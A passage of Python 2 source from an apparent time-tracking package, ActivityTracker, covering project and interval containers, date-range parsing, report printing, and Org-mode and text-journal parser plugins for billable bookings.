def items(self):
return self._data.items()
@property
def projects(self):
return self._data.values()
def __len__(self):
return len(self._data)
def __str__(self):
return self._single_str()
def _single_str(self, padding_count=0):
padding = ' ' * padding_count
if self.formatted_name:
s = padding + self.formatted_name + '\n'
else:
s = ''
for key, value in self._data.items():
s += padding + value._single_str(padding_count + 1)
return s
def copy(self, deep=False):
newcontainer = ProjectContainer()
if deep:
for key, value in self._data.items():
newcontainer._data[key] = value.copy(deep)
return newcontainer
@property
def interval_time(self):
total = datetime.timedelta()
for x in self.intervals:
total += x.total
return total
@property
def total_interval_time(self):
total = datetime.timedelta()
for x in self.intervals:
total += x.total
for x in self.projects:
total += x.total_interval_time
return total
def has_intervals(self, deepcheck=False):
if deepcheck:
for prj in self.projects:
if prj.has_intervals(True):
return True
return len(self.intervals) > 0
@property
def earliest_interval(self):
earliest = None
interval = None
for x in self.intervals:
if earliest is None or x.start < earliest:
earliest = x.start
interval = x
for x in self.projects:
checkinterval = x.earliest_interval
if earliest is None or checkinterval.start < earliest:
earliest = checkinterval.start
interval = checkinterval
return interval
@property
def latest_interval(self):
latest = None
interval = None
for x in self.intervals:
if latest is None or x.start > latest:
interval = x
for x in self.projects:
checkinterval = x.latest_interval
if latest is None or checkinterval.start > latest:
latest = checkinterval.start
interval = checkinterval
return interval
class Project(ProjectContainer):
"""Basically a project container with a name and possible intervals.
>>> project = Project('foo')
>>> project.formatted_name
u'foo'
"""
intervals = None
name = None
def __init__(self, name):
super(Project, self).__init__()
self.name = name
self.intervals = []
def fullkeys(self):
keys = []
keys.append(self.name)
for x in self.projects:
keys += [self.name + '/' + x for x in x.fullkeys()]
return keys
def prjkeys_without_intervals(self):
keys = set()
for name, prj in self._data.items():
for without in prj.prjkeys_without_intervals():
keys.add(name + '/' + without)
if not prj.has_intervals(True):
keys.add(name)
return keys
@property
def formatted_name(self):
t1 = self.interval_time
t2 = self.total_interval_time
if (t1.days > 0 or t1.seconds > 0 or t1.microseconds > 0) and t1 != t2:
total = u' (%s -- %s)' % (pretty(t1), pretty(t2))
elif t2.days > 0 or t2.seconds > 0 or t2.microseconds > 0:
total = u' (%s)' % pretty(t2)
else:
total = ''
return u'%s%s' % (self.name, total)
def copy(self, deep=False):
newprj = Project(self.name)
newprj.intervals = list(self.intervals)
if deep:
for key, value in self._data.items():
newprj._data[key] = value.copy(deep)
return newprj
parser_factories = {}
def get_parser_factory(name):
factory = parser_factories.get(name, None)
if factory is None:
lastpos = name.rfind('.')
parsermod = __import__(name[:lastpos], globals(), locals(), [''])
try:
factory = getattr(parsermod, name[lastpos + 1:])
except AttributeError, e:
raise ValueError('Could not load the factory plugin named %r '
'(original message is %r)' % (name, str(e)))
parser_factories[name] = factory
return factory
class TimeTracker(object):
"""An instance of this class will maintain state within itself.
"""
def __init__(self):
self.projects = ProjectContainer()
def parse(self, filenames, parser_name):
"""In general activitytracker monitors state while parsing. But,
the parse() function will erase state for current time, current date,
current note, and current project for every file that is parsed.
"""
logger.info('Using parser: %s' % parser_name)
parser = get_parser_factory(parser_name)(self.projects,
self.default_project)
args = filenames
filenames = []
for x in args:
if isinstance(x, (tuple, list)):
filenames += list(x)
else:
filenames.append(str(x))
for filename in filenames:
logger.info("Parsing %r" % filename)
f = open(filename)
try:
parser.parse_input(f)
finally:
f.close()
RE_DATE = re.compile('([0-9][0-9][0-9][0-9])-([0-9][0-9])-([0-9][0-9])')
def first_weekday(d):
"""Determine the first day of the week. At this time the first day
of the week is derived via the standard python calendar module's
firstweekday() function.
>>> from datetime import date
>>> first_weekday(date(2004, 03, 29))
datetime.date(2004, 3, 29)
>>> first_weekday(date(2007, 01, 3))
datetime.date(2007, 1, 1)
"""
checking = datetime.datetime(d.year, d.month, d.day)
while calendar.weekday(checking.year,
checking.month,
checking.day) != calendar.firstweekday():
checking -= ONE_DAY
return checking.date()
def estimate_startstop(datestr, nowfactory=None):
"""While handling user defined text it can be good to estimate the
intended start and stop datetime's. Requires using YYYY-MM-DD format
when specifying absolute dates. The nowfactory argument is meant to be
some callable that will return the time 'right now'.
>>> estimate_startstop('2007-05-05')
(datetime.datetime(2007, 5, 5, 0, 0),
datetime.datetime(2007, 5, 5, 23, 59))
>>> estimate_startstop('2007-05-05:2007-07-07')
(datetime.datetime(2007, 5, 5, 0, 0),
datetime.datetime(2007, 7, 7, 23, 59))
Make sure english month name matching works.
>>> startstop = estimate_startstop('march')
>>> (startstop[0].month, startstop[1].month)
(3, 3)
>>> startstop = estimate_startstop('nov')
>>> (startstop[0].month, startstop[1].month)
(11, 11)
And english week day names.
>>> from calendar import weekday
>>> startstop = estimate_startstop('tuesday')
>>> weekday(startstop[0].year, startstop[0].month, startstop[0].day)
1
>>> startstop = estimate_startstop('fri')
>>> weekday(startstop[0].year, startstop[0].month, startstop[0].day)
4
>>> from datetime import datetime
>>> def nowfactory(): return datetime(2006, 5, 7, 15, 23)
>>> estimate_startstop('today', nowfactory)
(datetime.datetime(2006, 5, 7, 0, 0),
datetime.datetime(2006, 5, 7, 23, 59))
>>> estimate_startstop('yesterday', nowfactory)
(datetime.datetime(2006, 5, 6, 0, 0),
datetime.datetime(2006, 5, 6, 23, 59))
>>> estimate_startstop('week', nowfactory)
(datetime.datetime(2006, 5, 1, 0, 0),
datetime.datetime(2006, 5, 7, 23, 59))
>>> estimate_startstop('lastweek', nowfactory)
(datetime.datetime(2006, 4, 24, 0, 0),
datetime.datetime(2006, 4, 30, 23, 59, 59))
>>> estimate_startstop('1', nowfactory)
(datetime.datetime(1, 1, 1, 0, 0),
datetime.datetime(1, 12, 31, 23, 59))
>>> estimate_startstop('apr', nowfactory)
(datetime.datetime(2006, 4, 1, 0, 0),
datetime.datetime(2006, 4, 30, 23, 59))
>>> estimate_startstop('2000:2004', nowfactory)
(datetime.datetime(2000, 1, 1, 0, 0),
datetime.datetime(2004, 12, 31, 23, 59))
"""
if not datestr:
raise ValueError('datestr cannot be empty')
if nowfactory is None:
nowfactory = datetime.datetime.now
def handle_one(onedatestr):
if onedatestr == 'all':
start = None
stop = None
elif onedatestr == 'today':
start = nowfactory()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
elif onedatestr == 'yesterday':
start = nowfactory() - ONE_DAY
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
elif onedatestr == 'lastweek':
start = nowfactory()
start = datetime.datetime(start.year, start.month, start.day)
start = first_weekday(start)
start = datetime.datetime(start.year, start.month, start.day) \
- datetime.timedelta(days=7)
stop = start + datetime.timedelta(days=6,
minutes=1439, seconds=59)
elif onedatestr == 'week':
start = nowfactory()
start = datetime.datetime(start.year, start.month, start.day)
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
start = first_weekday(start)
start = datetime.datetime(start.year, start.month, start.day)
elif onedatestr == 'month':
start = nowfactory()
start = datetime.datetime(start.year, start.month, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
elif onedatestr == 'year':
start = nowfactory()
start = datetime.datetime(start.year, 1, 1)
stop = nowfactory()
stop = datetime.datetime(stop.year, stop.month, stop.day, 23, 59)
else:
if RE_DATE.match(onedatestr) is not None:
start = datetime.datetime(*time.strptime(onedatestr,
'%Y-%m-%d')[:3])
stop = datetime.datetime(start.year, start.month,
start.day, 23, 59)
else:
vals = onedatestr.split('-')
if len(vals) == 1 and vals[0].isdigit():
year = int(vals[0])
start = datetime.datetime(year, 1, 1)
days = 364
if calendar.isleap(year):
days = 365
stop = start + datetime.timedelta(days=days,
minutes=60 * 23 + 59)
elif len(vals) == 2 and vals[0].isdigit() \
and vals[1].isdigit():
year = int(vals[0])
month = int(vals[1])
start = datetime.datetime(year, month, 1)
days = 364
if calendar.isleap(year):
days = 365
stop = start + datetime.timedelta(days=days,
minutes=60 * 23 + 59)
else:
# do some word checks for months
start = None
for pos, month in enumerate(MONTH_NAMES):
if month is not None and month.startswith(onedatestr):
month_index = pos
start = nowfactory()
start = datetime.datetime(start.year,
month_index, 1)
stop = last_monthday(start)
stop = datetime.datetime(stop.year, stop.month,
stop.day, 23, 59)
break
if start is None:
for pos, weekday in enumerate(WEEKDAY_NAMES):
if weekday.startswith(onedatestr):
start = nowfactory()
while calendar.weekday(start.year, start.month,
start.day) != pos:
start -= ONE_DAY
start = datetime.datetime(start.year,
start.month,
start.day,
0, 0)
stop = datetime.datetime(start.year,
start.month,
start.day,
23, 59)
break
if start is None:
raise ValueError("Couldn't derive a date value from %r"
% onedatestr)
return start, stop
args = datestr.split(':')
if len(args) > 2:
raise ValueError('Can only handle two date values')
start, end = handle_one(args[0])
if len(args) > 1:
ignorestart, end = handle_one(args[1])
return (start, end)
class TrackerReporter(object):
"""A helper class for formatting reports on a given tracker.
"""
def __init__(self, tracker):
self.tracker = tracker
def _remove_invalid(self, container, date_start, date_end,
project_filter):
for prj in container.projects:
intervals = []
for x in prj.intervals:
if x.start >= date_start and x.stop <= date_end:
intervals.append(x)
prj.intervals = intervals
self._remove_invalid(prj, date_start, date_end, project_filter)
def filtered_results(self, date_start=None, date_end=None,
project_filter=[]):
container = self.tracker.projects.copy(True)
self._remove_invalid(container, date_start, date_end, project_filter)
empty = set()
for name, prj in container.items():
for key in prj.prjkeys_without_intervals():
empty.add(name + '/' + key)
if not prj.has_intervals(True):
empty.add(name)
for key in reversed(sorted(empty)):
del container[key]
if project_filter:
newcontainer = ProjectContainer()
for key in container.fullkeys():
for prj in project_filter:
if key.find(prj) > -1:
newprj = newcontainer[key]
newprj.intervals = container[key].intervals
container = newcontainer
return container
def build_by_date(self, datedict, root, container=None, ancestors=[]):
if container is None:
container = root
ancestorkey = '/'.join(ancestors)
if ancestorkey:
ancestorkey += '/'
for prj in container.projects:
for interval in prj.intervals:
d = interval.start.date()
month = datedict.get((d.year, d.month), None)
if month is None:
month = {}
datedict[(d.year, d.month)] = month
existing = month.get(d, None)
if existing is None:
existing = ProjectContainer()
month[d] = existing
existing[ancestorkey + prj.name].intervals.append(interval)
newancestors = ancestors + [prj.name]
self.build_by_date(datedict, root, prj, newancestors)
def print_results(self,
date_start=None,
date_end=None,
display_intervals=False,
display_notes=False,
project_filter=[]):
if date_start is not None or date_end is not None or project_filter:
container = self.filtered_results(date_start, date_end,
project_filter)
else:
container = self.tracker.projects
out()
out("Filter: %s --- %s" % (pretty(date_start), pretty(date_end)))
earliest = container.earliest_interval
if earliest is not None:
earliest = pretty(earliest.start)
else:
earliest = 'N/A'
latest = container.latest_interval
if latest is not None:
latest = pretty(latest.start)
else:
latest = 'N/A'
out()
total = pretty(container.total_interval_time)
out('Months (%s):' % total)
d = {}
self.build_by_date(d, container)
for smonth in sorted(d.keys()):
month = d[smonth]
month_total = datetime.timedelta()
for c in month.values():
month_total += c.total_interval_time
out('%i, %s (%s)' % (smonth[0], MONTHS[smonth[1]].title(),
pretty(month_total)),
' ')
for day in sorted(month.keys()):
c = month[day]
out('%s (%s)' % (pretty(day),
pretty(c.total_interval_time)),
' ')
self.print_container(c, ' ', display_intervals,
display_notes)
out()
out('Totals (%s):' % total)
for prj_name in sorted(container.keys()):
prj = container[prj_name]
self.print_container(container=prj, padding=' ')
out()
def print_container(self,
container,
padding='',
display_intervals=False,
display_notes=False):
if container.formatted_name:
out(container.formatted_name, padding)
if display_intervals:
for interval in container.intervals:
out('%s to %s (%s)' % (pretty(interval.start.time()),
pretty(interval.stop.time()),
pretty(interval.total)),
padding + ' ')
if display_notes:
p = padding + ' '
for x in interval.note.splitlines():
out(x, p)
for key in sorted(container._data.keys()):
value = container._data[key]
self.print_container(value, padding + ' ',
display_intervals,
display_notes)
def parse_reporter_kwargs(opts):
kwargs = {}
if opts.date_filter is not None:
start, stop = estimate_startstop(opts.date_filter)
else:
start, stop = estimate_startstop('week')
kwargs.update(date_start=start,
date_end=stop,
display_intervals=opts.display_intervals,
display_notes=opts.display_notes,
project_filter=opts.project_filter.split(','))
return kwargs
def main():
import os
import optparse
import ConfigParser
parser = optparse.OptionParser()
parser.add_option('--date-filter', dest='date_filter',
help='Date range for bookings to watch for, dates '
'must be in YYYY-MM-DD format and can be one '
'date or start_date:stop_date. Values such as '
'"all", "week", "today", or "yesterday" are '
'also valid. In addition, it is possible to '
'specify an english month word or abbreviation of '
'an english month word... the year will '
'be assumed to be the current year. Default date '
'filter is "week" which list all entries so far '
'this current week starting with Monday')
parser.add_option('-i', '--display-intervals',
action='store_true',
default=False,
dest='display_intervals',
help='Show all bookings')
parser.add_option('-n', '--display-notes',
action='store_true',
default=False,
dest='display_notes',
help='Show all interval notes, only works in '
'combination with -i')
parser.add_option('--project-filter', dest='project_filter',
default='',
help='Comma-separated list of projects')
parser.add_option('-d', '--debug', dest='debug',
action='store_true',
default=False,
help='Show debugging output')
(opts, args) = parser.parse_args()
if opts.debug:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.WARNING)
configfilename = find_config_file('config.ini')
config = None
if not configfilename:
logger.warn("Couldn't open file %r" % configfilename)
else:
logger.info('Loading config file: %r' % configfilename)
config = ConfigParser.ConfigParser()
config.read(configfilename)
tracker = TimeTracker()
if config is not None and \
config.has_option('General', 'default_project') and \
config.get('General', 'default_project').strip():
prj = config.get('General', 'default_project')
prj = '/'.join([x.strip() for x in prj.split('/')
if x.strip()])
tracker.default_project = prj
if len(args) == 0 and config is not None:
for section in config.sections():
if section == 'File Group' or section.startswith('File Group:'):
logger.info('Handling file group %r' % section)
args = []
base_dir = config.get(section, 'base_dir')
r = re.compile(config.get(section, 'filename_match'))
for x in os.listdir(base_dir):
if r.match(x) is not None:
args.append(os.path.join(base_dir, x))
kwargs = {}
if config.has_option(section, 'parser_name'):
kwargs['parser_name'] = config.get(section, 'parser_name')
tracker.parse(args, **kwargs)
reporter = TrackerReporter(tracker)
reporter.print_results(**parse_reporter_kwargs(opts))
if __name__ == '__main__':
main() | ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/activitytracker/cli.py | cli.py |
from activitytracker import base
import datetime
import re
class EmacsOrgModeParser(base.AbstractFileParser):
"""A parser that understands OrgMode-formatted text files. Any
heading marked with a "book" tag and a timestamp as the next
line will be treated as a time interval.
"""
heading_re = re.compile('([*]+)(.*)')
tags_re = re.compile('(.*):([a-zA-Z0-9]+):')
date_re = re.compile('<([0-9]+)-([0-9]+)-([0-9]+) [a-zA-Z]* '
'([0-9]+):([0-9]+)(-([0-9]+):([0-9]+))?>')
def parse_input(self, input):
task = None
extra = []
for line in input:
line = line.rstrip()
headingmatch = self.heading_re.match(line)
if not headingmatch:
extra.append(line)
continue
heading = headingmatch.group(2).strip()
tags = []
tagsmatch = self.tags_re.match(heading)
if tagsmatch:
heading = tagsmatch.group(1).strip()
tags = [x for x in tagsmatch.group(2).split(':') if x.strip()]
if 'book' in tags:
if task:
self.handle(task, extra)
task = heading
extra = []
else:
extra.append(line)
if task:
self.handle(task, extra)
def handle(self, task, extra):
m = self.date_re.match(extra[0])
if not m:
return
start = [m.group(1), m.group(2), m.group(3), m.group(4), m.group(5)]
stop = [m.group(1), m.group(2), m.group(3), m.group(7), m.group(8)]
if stop[3] is None:
stop[3] = int(start[3]) + 1
stop[4] = 0
start = datetime.datetime(*map(int, start))
stop = datetime.datetime(*map(int, stop))
task = '/'.join([x.strip() for x in task.split('/') if x.strip()])
note = '\n'.join([x for x in extra[1:] if x.strip()])
interval = base.Interval(start, stop, note)
self.projects[task].intervals.append(interval) | ActivityTracker | /ActivityTracker-1.0.tar.gz/ActivityTracker-1.0/activitytracker/plugins/orgmode.py | orgmode.py |
import calendar
import csv
import datetime
import os
import re
import sys
import time
from activitytracker.base import (AbstractFileParser, Interval,
find_config_file)
namespace = {}
configfilename = find_config_file('textconfig')
if configfilename:
execfile(configfilename, namespace)
BASEDIR = namespace['BASEDIR']
CLIENT_MAPPINGS = namespace['CLIENT_MAPPINGS']
FANCY_CLIENT_MAPPINGS = namespace['FANCY_CLIENT_MAPPINGS']
ACTION_MAPPINGS = namespace['ACTION_MAPPINGS']
for action in ACTION_MAPPINGS.keys():
exprs = ACTION_MAPPINGS[action]
regexes = []
for expr in exprs:
regexes.append(re.compile(expr, re.IGNORECASE))
ACTION_MAPPINGS[action] = regexes
RE_JOURNAL_FILE = re.compile('^month-([a-zA-Z]*)-([0-9]*).txt$')
RE_DAY_BEGINS = re.compile('[dD][aA][yY]: *([a-zA-Z]*) *([0-9][0-9]?) *'
', *([0-9][0-9][0-9][0-9]).*')
RE_TIME = re.compile('([0-9][0-9]?):([0-9][0-9]?)([ap]m)? *')
RE_ONLY_TIME = re.compile('^([0-9][0-9]?):([0-9][0-9]?)([ap]m)? *$')
RE_TRAILING_HOURS = re.compile(': *[0-9]*hr')
RE_STOPPED = re.compile(' +stopped +[a-zA-Z ]*([0-9][0-9]?):([0-9][0-9]?)'
'([ap]m)? *')
RE_NOT_BILLABLE = re.compile(' *not? *bill(able)?')
RE_DATE = re.compile('([0-9][0-9][0-9][0-9])-([0-9][0-9])-([0-9][0-9])')
MONTHS = [None, 'january', 'february', 'march', 'april', 'may', 'june', 'july',
'august', 'september', 'october', 'november', 'december']
STATE_NONE = 0
STATE_JUST_READ_TIME = 1
ONE_DAY = datetime.timedelta(days=1)
class Client(object):
def __init__(self, name):
self.name = name
self.projects = {'NO PROJECT': Project('NO PROJECT')}
def clone(self):
client = Client(self.name)
client.projects = self.projects
return client
@property
def bookings(self):
bookings = BookingContainer()
for project in self.projects.values():
bookings += project.bookings
return bookings
class Project(object):
def __init__(self, name):
self.name = name
self.bookings = BookingContainer()
def clone(self):
prj = Project(self.name)
prj.bookings = self.bookings.clone()
return prj
class Booking(object):
def __init__(self, start, stop, comment=''):
self.start = start
self.stop = stop
self.comment = comment
@property
def time(self):
return self.stop - self.start
def clone(self):
return Booking(self.start, self.stop, self.comment)
@property
def billable(self):
return RE_NOT_BILLABLE.search(self.comment) is None
class BookingContainer(list):
def __init__(self, initlist=None):
self.__total_time = datetime.timedelta()
self.__total_billable_time = datetime.timedelta()
if initlist is not None:
super(BookingContainer, self).__init__(initlist)
for x in initlist:
self._add_time(x)
else:
super(BookingContainer, self).__init__()
def _add_time(self, booking):
self.__total_time += booking.time
if booking.billable:
self.__total_billable_time += booking.time
@property
def total_time(self):
return self.__total_time
@property
def total_billable_time(self):
return self.__total_billable_time
def append(self, x):
if not isinstance(x, Booking):
raise TypeError('object is not of type "Booking"')
self._add_time(x)
return list.append(self, x)
def insert(self, index, x):
self._add_time(x)
return list.insert(self, index, x)
def __iadd__(self, other):
for x in other:
self._add_time(x)
return list.__iadd__(self, other)
def clone(self):
container = BookingContainer()
for booking in self:
container.append(booking.clone())
return container
def fancy_datetime(d):
date_format = '%B %d, %Y (%A)'
time_format = '%I:%M%p'
tm = d.strftime(time_format).lower()
if tm.startswith('0'):
tm = tm[1:]
if isinstance(d, datetime.datetime):
return d.strftime(date_format) + ' at ' + tm
elif isinstance(d, datetime.date):
return d.strftime(date_format)
elif isinstance(d, datetime.time):
return tm
def last_monthday(dt):
t = dt
while t.month == dt.month:
t += ONE_DAY
t -= ONE_DAY
return t
def fancy_booking_totals(bookings):
total = bookings.total_time
billable = bookings.total_billable_time
nonbillable = total - billable
if nonbillable:
extra = ' [%s *]' % fancy_time_amount(nonbillable)
else:
extra = ''
return '%s%s' % (fancy_time_amount(total),
extra)
def fancy_time_amount(total):
hours = (total.days * 24.0) + (total.seconds / 3600.0)
return '%s hrs' % hours
def first_weekday(d):
checking = d
while calendar.weekday(checking.year,
checking.month,
checking.day) != calendar.firstweekday():
checking -= ONE_DAY
return checking
class Processor(object):
def __init__(self):
self.state = STATE_NONE
self.clients = {}
self.current_date = None
self.actions = {}
self.first_day = None
self.last_day = None
self.last_comments = []
def _start_day(self, date):
if getattr(self, 'start_time', None) is not None \
and getattr(self, 'last_funny_datetime', None) is not None:
start = datetime.datetime.combine(self.current_date,
self.start_time)
end = datetime.datetime.combine(self.current_date,
self.last_funny_datetime.time())
booking = Booking(start, end, '\n'.join(self.last_comments))
if getattr(self, 'last_project', None) is not None:
self.last_project.bookings.append(booking)
elif getattr(self, 'last_client', None) is not None:
project = self.last_client.projects['NO PROJECT']
project.bookings.append(booking)
if self.first_day is None or date < self.first_day:
self.first_day = date
if self.last_day is None or date > self.last_day:
self.last_day = date
self.current_date = date
self.last_time = None
self.start_time = None
self.last_interval = None
self.last_client = None
self.last_project = None
self.last_funny_datetime = None
self.last_comments = []
def _journal_file(self, month, year):
m = MONTHS[month]
m = m[0].upper() + m[1:]
return os.path.join(BASEDIR, 'month-%s-%s.txt' % (m, year))
def _handle_client_project(self, v):
client, project_name = client_and_project(v)
client = CLIENT_MAPPINGS.get(client, client)
client_obj = self.clients.get(client, Client(client))
self.clients[client] = client_obj
self.last_client = client_obj
if project_name is not None:
projects = client_obj.projects
project = projects.get(project_name, Project(project_name))
projects[project_name] = project
self.last_project = project
else:
self.last_project = None
def process(self, month, year):
if isinstance(month, basestring):
month = MONTHS.index(month.lower())
if isinstance(year, basestring):
year = int(year)
f = open(self._journal_file(month, year), 'r')
try:
self.process_input(f)
finally:
f.close()
def process_input(self, f):
for line in f:
stripped = line.strip()
if not stripped:
continue
for action, exprs in ACTION_MAPPINGS.items():
for expr in exprs:
if expr.search(stripped) is not None:
day = self.actions.get(self.current_date, {})
self.actions[self.current_date] = day
category = day.get(action, [])
day[action] = category
category.append(stripped)
record_comment = True
if self.state is STATE_JUST_READ_TIME:
self.last_comments = []
if not stripped.startswith('-'):
self._handle_client_project(stripped)
record_comment = False
self.state = STATE_NONE
m = RE_ONLY_TIME.match(stripped)
if m is not None:
self.state = STATE_JUST_READ_TIME
self._handle_time(stripped)
record_comment = False
if m is None:
m = RE_STOPPED.search(stripped)
if m is not None:
self._handle_time(stripped, True)
record_comment = False
if m is None:
m = RE_DAY_BEGINS.search(stripped)
if m is not None:
year = int(m.group(3))
day = int(m.group(2))
month = MONTHS.index(m.group(1).lower())
date = datetime.date(year, month, day)
self._start_day(date)
record_comment = False
if m is None:
m = RE_TIME.search(stripped)
if m is not None:
comb = datetime.datetime.combine
self.last_funny_datetime = comb(self.current_date,
parse_time(stripped))
record_comment = False
if record_comment:
self.last_comments.append(stripped)
def _handle_time(self, v, stopped=False):
tm = parse_time(v.strip())
if self.start_time is None:
self.start_time = tm
self.last_project = None
self.last_client = None
else:
start = datetime.datetime.combine(self.current_date,
self.start_time)
end = datetime.datetime.combine(self.current_date,
tm)
if self.last_funny_datetime is not None and not stopped:
comb = datetime.datetime.combine
end = comb(self.current_date,
self.last_funny_datetime.time())
booking = Booking(start, end, '\n'.join(self.last_comments))
if self.last_project is not None:
self.last_project.bookings.append(booking)
elif self.last_client is not None:
project = self.last_client.projects['NO PROJECT']
project.bookings.append(booking)
self.last_interval = end - start
if stopped:
self.start_time = None
else:
self.start_time = tm
if self.last_interval.days < 0:
raise ValueError("Error on day: %s (%s, %s)" % \
(fancy_datetime(self.current_date),
start,
end))
self.last_funny_datetime = None
self._last_time = tm
def _build_filtered(self, client_filter, project_filter,
comment_filter,
date_start_filter, date_stop_filter):
class Filtered(object):
pass
filtered = Filtered()
filtered.clients = {}
filtered.earliest = None
filtered.latest = None
filtered.bookings = BookingContainer()
filtered.first_day = self.first_day
filtered.last_day = self.last_day
if date_start_filter is not None:
filtered.first_day = date_start_filter.date()
if date_stop_filter is not None:
filtered.last_day = date_stop_filter.date()
for client_name in sorted(self.clients.keys()):
if matches(client_name, client_filter):
client_obj = self.clients[client_name].clone()
updated_projects = {}
for project_name in sorted(client_obj.projects.keys()):
if matches(project_name, project_filter):
orig_project = client_obj.projects[project_name]
updated_project = orig_project.clone()
updated_project.bookings = BookingContainer()
for booking in orig_project.bookings:
if date_start_filter is None or \
(booking.start >= date_start_filter and \
booking.start <= date_stop_filter and \
booking.stop >= date_start_filter and \
booking.stop <= date_stop_filter):
if comment_filter is None or \
comment_filter.search(booking.comment) \
is not None:
filtered.bookings.append(booking)
updated_project.bookings.append(booking)
if filtered.earliest is None or \
booking.start < filtered.earliest:
filtered.earliest = booking.start
if filtered.latest is None or \
booking.stop > filtered.latest:
filtered.latest = booking.stop
if len(updated_project.bookings) > 0:
updated_projects[project_name] = updated_project
if len(updated_projects) > 0:
filtered.clients[client_name] = client_obj
client_obj.projects = updated_projects
filtered.actions = {}
for day in sorted(self.actions.keys()):
categories = self.actions[day]
if day >= filtered.first_day and day <= filtered.last_day:
if categories:
filtered.actions[day] = categories
return filtered
def show_results(self, out, client_filter=None, project_filter=None,
date_start_filter=None, date_stop_filter=None,
report_type=None,
comment_filter=None,
display_bookings=False,
display_bookings_comments=False):
if report_type is None:
report_type = 'date'
else:
report_type = report_type.lower()
filtered = self._build_filtered(client_filter, project_filter,
comment_filter,
date_start_filter, date_stop_filter)
if report_type == 'csv':
writer = csv.writer(sys.stdout)
writer.writerow(['Client', 'Project', 'Date',
'Duration (hrs)', 'Comments'])
for client_name in sorted(filtered.clients.keys()):
client = filtered.clients[client_name]
projects = client.projects
for project_name in projects:
project = projects[project_name]
for booking in project.bookings:
tm = booking.time
tm = tm.seconds / 60.0 / 60.0
writer.writerow([client_name,
project_name,
booking.start.date(),
tm,
booking.comment])
else:
print >> out, "Filter:"
if client_filter is not None:
print >> out, " Client(s): %s" % str(client_filter)
if project_filter is not None:
print >> out, " Project(s): %s" % str(project_filter)
if date_start_filter is not None:
print >> out, " Start Date: %s" \
% fancy_datetime(date_start_filter)
if date_stop_filter is not None:
print >> out, " Stop Date: %s" \
% fancy_datetime(date_stop_filter)
print >> out
if filtered.earliest is None:
earliest = 'N/A'
else:
earliest = fancy_datetime(filtered.earliest)
print >> out, "Earliest: %s" % earliest
if filtered.earliest is None:
latest = 'N/A'
else:
latest = fancy_datetime(filtered.latest)
print >> out, "Latest: %s" % latest
if filtered.earliest is None or filtered.latest is None:
tracked = 'N/A'
else:
days = (filtered.latest - filtered.earliest).days
if days > 365:
tracked = '%.2f years' % (days / 365.0)
else:
seconds = (filtered.latest - filtered.earliest).seconds
minutes = seconds / 60.0
hours = minutes / 60.0
extra_days = hours / 24.0
tracked = '%.1f days' % (days + extra_days)
print >> out, "Total Time Tracked: %s" % tracked
print >> out
print >> out, 'Dates:'
days = {}
for client_name, client in filtered.clients.items():
for project_name, project in client.projects.items():
for booking in project.bookings:
date = booking.start.date()
day = days.get(date, {'clients': {},
'bookings': BookingContainer()})
days[date] = day
day['bookings'].append(booking)
default = {'projects': {},
'bookings': BookingContainer()}
client_dict = day['clients'].get(client_name, default)
day['clients'][client_name] = client_dict
client_dict['bookings'].append(booking)
projects = client_dict['projects']
project_bookings = projects.get(project_name,
BookingContainer())
projects[project_name] = project_bookings
project_bookings.append(booking)
print >> out
for date in sorted(days.keys()):
day = days[date]
print >> out, " %s (total: %s)" \
% (fancy_datetime(date),
fancy_booking_totals(day['bookings']))
for client_name in sorted(day['clients'].keys()):
client = day['clients'][client_name]
print >> out, ' %s (total: %s)' \
% (FANCY_CLIENT_MAPPINGS[client_name],
fancy_booking_totals(client['bookings']))
for project_name in sorted(client['projects'].keys()):
bookings = client['projects'][project_name]
print >> out, ' %s (%s)' \
% (project_name, fancy_booking_totals(bookings))
if display_bookings:
for booking in bookings:
print >> out, ' %s to %s (%s)' \
% (fancy_time(booking.start),
fancy_time(booking.stop),
fancy_time_amount(booking.stop -
booking.start))
if display_bookings_comments:
if booking.comment.strip():
lines = booking.comment.split('\n')
for line in lines:
print " %s" % line
print >> out
print >> out, "Clients (total: %s):" \
% fancy_booking_totals(filtered.bookings)
print >> out
for client in sorted(filtered.clients.keys()):
client_obj = filtered.clients[client]
all_bookings = client_obj.bookings
print >> out, ' %s (total: %s)' \
% (FANCY_CLIENT_MAPPINGS.get(client, client),
fancy_booking_totals(all_bookings))
projects = client_obj.projects
for project_name in sorted(projects.keys()):
project = projects[project_name]
print >> out, ' %s: %s' \
% (project_name,
fancy_time_amount(project.bookings.total_time))
print >> out
def show_bookings(out, prefix, project, show_comments):
print >> out, '%sBookings:' % prefix
days = {}
for booking in project.bookings:
day = days.get(booking.start.date(), BookingContainer())
days[booking.start.date()] = day
day.append(booking)
for day in sorted(days.keys()):
bookings = days[day]
print " %s%s (subtotal: %s)" % (prefix, day,
fancy_booking_totals(bookings))
for booking in bookings:
hours = (booking.stop - booking.start).seconds / 3600.0
fancy = '%s to %s (%s hrs)' % (fancy_time(booking.start),
fancy_time(booking.stop), hours)
if booking.billable:
asterisk = ''
else:
asterisk = ' *'
print " %s%s%s" % (prefix, fancy, asterisk)
if show_comments:
for line in booking.comment.split('\n'):
print " %s%s" % (prefix, line)
def fancy_time(v):
if isinstance(v, datetime.datetime):
v = v.time()
s = v.strftime('%I:%M%p')
if s.startswith('0'):
s = s[1:]
return s.lower()
def matches(v, lst):
if lst is None:
return True
for x in lst:
if v.find(x) > -1:
return True
def parse_time(v):
m = RE_STOPPED.search(v)
if m is None:
m = RE_ONLY_TIME.match(v)
if m is None:
m = RE_TIME.search(v)
hour = int(m.group(1))
minute = int(m.group(2))
if m.group(3) == 'pm':
if hour != 12:
hour += 12
if m.group(3) == 'am':
if hour == 12:
hour = 0
tm = datetime.time(hour, minute)
return tm
def client_and_project(v):
pos = v.find(':')
if pos == -1:
pos = v.find('/')
if pos != -1:
client = v[:pos].strip()
project_name = v[pos + 1:].strip()
else:
client = v.strip()
project_name = None
if project_name is not None and project_name.strip() == '':
project_name = None
client = client.lower()
if project_name is not None:
project_name = project_name.lower()
m = RE_TRAILING_HOURS.search(project_name)
if m is not None:
project_name = project_name[:m.start()]
pos = project_name.find('[not billing]')
if pos > -1:
project_name = project_name.replace('[not billing]', '').strip()
